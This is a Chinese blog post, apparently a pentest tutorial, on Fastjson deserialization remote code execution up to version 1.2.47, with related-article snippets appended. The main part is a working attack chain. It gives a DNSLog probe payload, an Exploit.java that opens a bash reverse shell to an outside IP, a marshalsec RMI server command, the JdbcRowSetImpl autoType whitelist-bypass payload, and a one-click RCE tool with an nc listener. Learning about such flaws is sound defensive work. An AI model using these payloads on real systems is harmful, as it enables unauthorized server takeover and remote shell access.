Fastjson漏洞

最新推荐文章于 2025-03-24 22:45:05 发布
最新推荐文章于 2025-03-24 22:45:05 发布
阅读量5.4k 收藏 7
点赞数 1
分类专栏: 初学者常见问题 文章标签: json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43873557/article/details/113732612
版权
本文详细介绍了Fastjson的历史漏洞,特别是1.2.47版本的反序列化漏洞,以及如何构造恶意利用链绕过白名单。还探讨了Fastjson的利用方式,包括通过DNSLog、RMIRefServer和利用工具执行命令,强调了Fastjson在JSON解析中的安全隐患。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

➢ Fastjson概述
Fastjson是阿里巴巴公司开源的一款json解析器,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到JavaBean。

➢历史漏洞
Fastjson <=1.2.24 反序列化远程命令执行漏洞
Fastjson <=1.2.41 反序列化远程命令执行漏洞
Fastjson <=1.2.42 反序列化远程命令执行漏洞
Fastjson <=1.2.43 反序列化远程命令执行漏洞
Fastjson <=1.2.45 反序列化远程命令执行漏洞
Fastjson <=1.2.47 反序列化远程命令执行漏洞
Fastjson <=1.2.62 反序列化远程命令执行漏洞
Fastjson <=1.2.66 反序列化远程命令执行漏洞

➢ Fastjson1.2.47反序列化漏洞
1.2.24:fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
1.2.47:fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

➢ Fastjson寻找
fastjson的作用是用于对JSON格式的数据进行解析和打包,所以出现json格式的地方就有可能使用了fastjson
在这里插入图片描述
➢ Json认识

{
"name":"smith".
"age":28,
"sex":"男"
"school":{
"sname":"南京大学".
"address":"南京市鼓楼区汉口路22号"
}
}
{"name":"smith","empno":1001,"job":"clerck","sal":9000.00,"comm":5000.00}

➢ Fastjson漏洞发现(利用 dnslog)

{"name":{"@type":"java.net.InetAddress","val":"test.sr3uwk.ceye.io"}}

在这里插入图片描述
➢ Fastjson的利用(编译)
新建Exploit.java
内容为:https://cowtransfer.com/s/7841d5d6121747
然后cmd下执行:javac Exploit.java,就会生成一个class文件

//javac Exploit.java
import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
public Exploit(){
try{
Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i &gt;&
/dev/tcp/139.9.198.30/6666 0&gt;&1");
}catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv){
Exploit e = new Exploit();
}
}

➢ Fastjson的利用
把编译好的class文件传到外网系统中,可以访问验证一下是否开启,是否把class文
件放进入,
项目地址:https://github.com/mbechler/marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer
“http://139.9.198.30/2/#Exploit” 1234

在这里插入图片描述
➢ Fastjson的利用
执行攻击payload:

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"
b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://139.9.1
98.30:1234/Exploit","autoCommit":true}}

➢ Fastjson的利用(反弹 shell)在这里插入图片描述
在这里插入图片描述
➢ Fastjson的利用(简捷)
项目地址:
https://github.com/Betsy0/fastjson_rce_tool

➢ Fastjson的利用(简捷)
java -cp fastjson_tool.jar fastjson.HRMIServer 139.9.198.30 1234 "要执行的命
令“
编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html在这里插入图片描述
➢ Fastjson的利用(简捷)
生成payload在这里插入图片描述
➢ Fastjson的利用(简捷)
Nc监听端口,并将生成的payload执行在这里插入图片描述

Fastjson漏洞分析与复现
未完成的歌~的博客
08-26 1714
fastjson是阿里巴巴开源的JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。
Java安全篇-Fastjson漏洞
m0_63138919的博客
03-28 4319
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
fastjson1.2.75暂未修补的反序列化“漏洞“-附件资源
03-02
fastjson1.2.75暂未修补的反序列化“漏洞“-附件资源
Fastjson 被曝高危漏洞!附解决方法
JAVA葵花宝典
05-30 4637
来源:安全客https://www.anquanke.com/post/id/2070290x01 漏洞背景2020年05月28日, 360CERT监测发现业内安全厂商发布了Fastj...
【渗透测试】Fastjson 反序列化漏洞原理(一)
最新发布
SunnyCat
03-24 1221
反序列化漏洞是指攻击者通过构造恶意的 JSON 数据,使得反序列化过程执行了未经授权的代码。这通常发生在应用程序接受外部输入并将其反序列化为对象时,如果输入的数据格式不符合预期,或者应用程序没有适当地验证和过滤输入,攻击者可以注入恶意代码并执行。
告急!fastjson又被发现漏洞,这次危害可导致服务瘫痪!
Java后端技术
09-08 380
点击上方“Java后端技术”,选择“置顶或者星标”你关注的就是我关心的!本文来源:https://tinyurl.com/y53yanrw上一篇:不敢相信?System....
fastjson 系列漏洞
SHELLCODE_8BIT的博客
11-14 2757
jackson 和 fastjson 在序列化的时候,先利用反射找到对象类的所有 get 方法,接下来去 get,然后小写化,作为 json 的每个 key 值,而 get 方法的返回值作为 value。接下来再反射 field,添加到 json 中。
fastjson漏洞环境
01-12
在给定的“fastjson漏洞环境”中,我们关注的是三个特定版本的 Fastjson 反序列化漏洞:1.2.67、1.2.66 和 1.2.62。 **一、Fastjson 反序列化漏洞** 1. **什么是反序列化漏洞?** 反序列化是将已序列化的数据恢复...
FastjsonScan.jar 用于burp插件,扫描Fastjson漏洞
07-05
burp插件
Fastjson 漏洞复现1.2.24-rce
人们并不感谢罗辑
08-22 2001
fastjson是阿里巴巴开源的一个json解析库,能将json对象和json字符串进行序列化和反序列化操作。autotype功能是是漏洞的关键,autotype允许用户通过@type字段来选择具体的类进行反序列化。如果用户没有对反序列化的类进行严格限制,攻击者可以构造恶意的json字符串来触发这个漏洞
fastjson漏洞
m0_37180957的博客
05-30 545
对于最新版本的fastjson,是有漏洞的。 版本: com.alibaba fastjson 1.2.68 在序列化的过程中,是存在白名单漏洞的。具体需要关注一下反序列化的过程。 https://cert.360.cn/daily
【Java代码审计】Fastjson1.2.24漏洞分析
网络安全从业者的学习笔记
04-03 643
Fastjson是由阿里巴巴研发的一个java库,用来实现Java对象转换JSON格式以及JSON字符串转换为对象。 在Fastjson
FastJSON安全漏洞
隐心咒Amor的博客
11-22 248
安全漏洞
Fastjson 反序列化漏洞
m0_65150886的博客
10-10 985
Fastjson在1.2.24以及之前版本存在远程代码执行高危安全漏洞Fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链Fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
autotype安全 fastjson_Fastjson 远程代码执行漏洞
weixin_39605463的博客
01-05 174
本文章来源于观星朋友圈 补天 。下午15左右收到消息fastjson爆出全版本存在远程代码执行漏洞01fastjson介绍Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。Fastjson 源码地址:https...
fastjson版本_Fastjson被曝出“高危”远程代码执行漏洞
weixin_39612058的博客
11-30 162
5月28日,360网络安全响应中心(360-CERT)发布“Fastjson远程代码执行漏洞通告”。通告称,Java 库fastjson <= 1.2.68 版本存在远程代码执行漏洞漏洞被利用可直接获取服务器权限。360网络安全响应中心评定其为“高危漏洞”,影响面“广泛”。 据悉,该漏洞的影响版本为fastjson <=1.2.68和fastjson sec版本 <= sec...
android fastjson漏洞_Fastjson 反序列化漏洞
weixin_32309879的博客
01-12 593
作者:Longofo@知道创宇404实验室时间:2020年4月27日Fastjson没有cve编号,不太好查找时间线,一开始也不知道咋写,不过还是慢慢写出点东西,幸好fastjson开源以及有师傅们的一路辛勤记录。文中将给出与Fastjson漏洞相关的比较关键的更新以及漏洞时间线,会对一些比较经典的漏洞进行测试及修复说明,给出一些探测payload,rce payload。Fastjson解析流程...
Fastjson反序列化漏洞
热门推荐
LJH1999ZN的博客
03-31 3万+
一、fastjson简介 fastjson是java的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象 提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符串,parseObject 方法则反过来将 JSON 字符串转换成对象。 二、fastjson反序列化漏洞原理 在反序列化的时候,会进入parseField方法,进
fastjson 漏洞
09-02
你想了解有关 fastjson 漏洞的信息吗?fastjson 是一个流行的 Java JSON 库,但在过去的一段时间里,它曾经存在一些安全漏洞。其中最著名的是 fastjson 1.2.24 版本以下的版本中的反序列化漏洞(CVE-2020-1948),该...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值